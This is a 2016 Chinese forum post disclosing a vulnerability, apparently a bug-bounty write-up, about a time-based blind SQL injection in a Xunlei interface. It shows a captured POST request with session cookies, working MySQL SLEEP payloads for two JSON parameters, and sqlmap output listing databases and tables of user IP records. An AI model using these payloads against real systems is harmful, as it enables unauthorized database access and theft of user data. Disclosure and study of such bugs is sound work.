HanDs
NO.2

[7月漏洞公开] 迅雷一处时间盲注 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

rt
必须吐槽一下迅雷src的页面怎么那么简洁
完全不知道怎么在那提交

详细说明:

抓的post包

code 区域
POST /location/upload_peerinfo HTTP/1.1
Host: interface.xl9.xunlei.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: sessionid=CC824A20602118045BF9B8150499AD86; userid=50947382; peerid=50E549E88890F5GQ; client=pc; v=7.10.33.358
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

{"cpu":"","devicename":"ZHONGWEN","devicetype":"pc","imei":"","memory":""}



devicename\devicetype 都是注入点

漏洞证明:

code 区域
---
Parameter: JSON devicename ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: {"cpu":"","devicename":"ZHONGWEN' AND (SELECT * FROM (SELECT(SLEEP(5)))DEhT) AND 'AgGq'='AgGq","devicetype":"pc","imei":"","memory":""}

Parameter: JSON devicetype ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: {"cpu":"","devicename":"ZHONGWEN","devicetype":"pc' AND (SELECT * FROM (SELECT(SLEEP(5)))KNUs) AND 'HTgX'='HTgX","imei":"","memory":""}
---



code 区域
available databases [6]:
[*] `xl9\x81\x81omplain`
[*] information_schema
[*] x
[*] xl9_location
[*] xl9_tracer
[*] xl9_user_ip_loc



code 区域
[15:55:53] [INFO] fetching tables for database: 'xl9_user_ip_loc'
[15:55:53] [INFO] fetching number of tables for database 'xl9_user_ip_loc'
[15:55:53] [INFO] resumed: 257



xl9_user_ip_loc 这个库挺大的 都是用户记录的ip吧 。

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
迅雷 时间
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组